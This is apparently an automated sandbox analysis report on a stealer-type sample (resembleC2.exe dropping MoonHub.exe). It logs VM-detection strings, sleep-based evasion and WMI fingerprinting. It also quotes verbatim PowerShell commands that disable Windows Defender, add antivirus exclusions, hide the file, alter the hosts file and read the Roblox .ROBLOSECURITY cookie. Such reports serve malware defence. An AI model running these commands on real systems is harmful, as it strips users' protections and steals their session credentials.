                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\resembleC2.exe Memory allocated: 13D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\resembleC2.exe Memory allocated: 1B000000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe Memory allocated: 3670000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe Memory allocated: 1BBD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Memory allocated: 15658920000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Memory allocated: 156723D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\resembleC2.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597875
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597766
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597641
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597531
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597422
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597311
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597203
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 597094
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 596981
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 596870
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 596485
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 596281
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 596166
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 596062
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595943
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595813
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595703
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595593
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595484
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595375
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595266
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595156
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 595045
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594938
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594813
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594688
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594578
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594469
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594344
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594232
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594125
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 594016
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593906
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593795
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593670
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593562
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593453
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593340
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593234
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593125
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 593014
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592906
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592792
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592684
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592578
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592466
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592359
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Thread delayed: delay time: 592250
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Window / User API: threadDelayed 5210
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Window / User API: threadDelayed 4632
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7083
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2622
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2642
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 752
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5227
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1069
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4818
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1836
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1537
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2525
                            Source: C:\Users\user\Desktop\resembleC2.exe TID: 2924 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe TID: 5968 Thread sleep count: 292 > 30
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe TID: 6468 Thread sleep count: 204 > 30
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe TID: 4580 Thread sleep count: 61 > 30
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -27670116110564310s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597875s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597766s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597641s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597531s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597422s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597311s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597203s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -597094s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -596981s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -596870s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -596485s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -596281s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -596166s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -596062s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595943s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595813s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595703s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595593s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595484s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595375s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595266s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595156s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -595045s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594938s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594813s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594688s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594578s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594344s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594125s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -594016s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593906s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593795s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593670s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593562s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593453s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593340s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593234s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593125s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -593014s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592906s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592792s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592684s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592578s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592466s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592359s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400 Thread sleep time: -592250s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260 Thread sleep count: 7083 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260 Thread sleep count: 2622 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720 Thread sleep count: 2642 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5280 Thread sleep count: 752 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1248 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372 Thread sleep count: 5227 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964 Thread sleep count: 1069 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368 Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700 Thread sleep count: 4818 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 Thread sleep count: 1836 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep count: 1537 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep count: 2525 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348 Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                            Source: C:\Users\user\Desktop\resembleC2.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597875Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597766Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597641Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597531Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597422Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597311Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597203Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597094Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596981Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596870Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596485Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596281Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596166Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595943Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595703Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595593Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595484Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595375Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595266Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595156Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595045Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594938Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594688Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594469Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594232Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594016Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593795Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593670Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593453Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593340Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593014Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592792Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592684Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592578Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592466Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592359Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592250Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.dr; Binary or memory string: vboxtray
                            Source: gqnbO.scr.5.dr; Binary or memory string: vboxservice
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.dr; Binary or memory string: qemu-ga
                            Source: gqnbO.scr.5.dr; Binary or memory string: vmwareuser
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.dr; Binary or memory string: vmusrvc
                            Source: gqnbO.scr.5.dr; Binary or memory string: vmwareservice+discordtokenprotector
                            Source: gqnbO.scr.5.dr; Binary or memory string: vmsrvc
                            Source: gqnbO.scr.5.dr; Binary or memory string: vmtoolsd
                            Source: gqnbO.scr.5.dr; Binary or memory string: vmwaretray
                            Source: resembleC2.exe, 00000000.00000002.2183248209.000000000119E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmwareservice
                            Source: 6z2guuz0ldkdgc1o.exe, 00000002.00000002.3375654871.000000001D2B0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWrsio%SystemRoot%\system32\mswsock.dllon="false" allowDefinition="MachineToApplication" />
                            Source: MoonHub.exe, 00000005.00000002.2896371873.00000156587A2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process information queried: ProcessInformation
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe; Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\resembleC2.exe; Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; File written: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\Desktop\resembleC2.exe; Process created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
                            Source: C:\Users\user\Desktop\resembleC2.exe; Process created: C:\Users\user\AppData\Local\Temp\MoonHub.exe "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
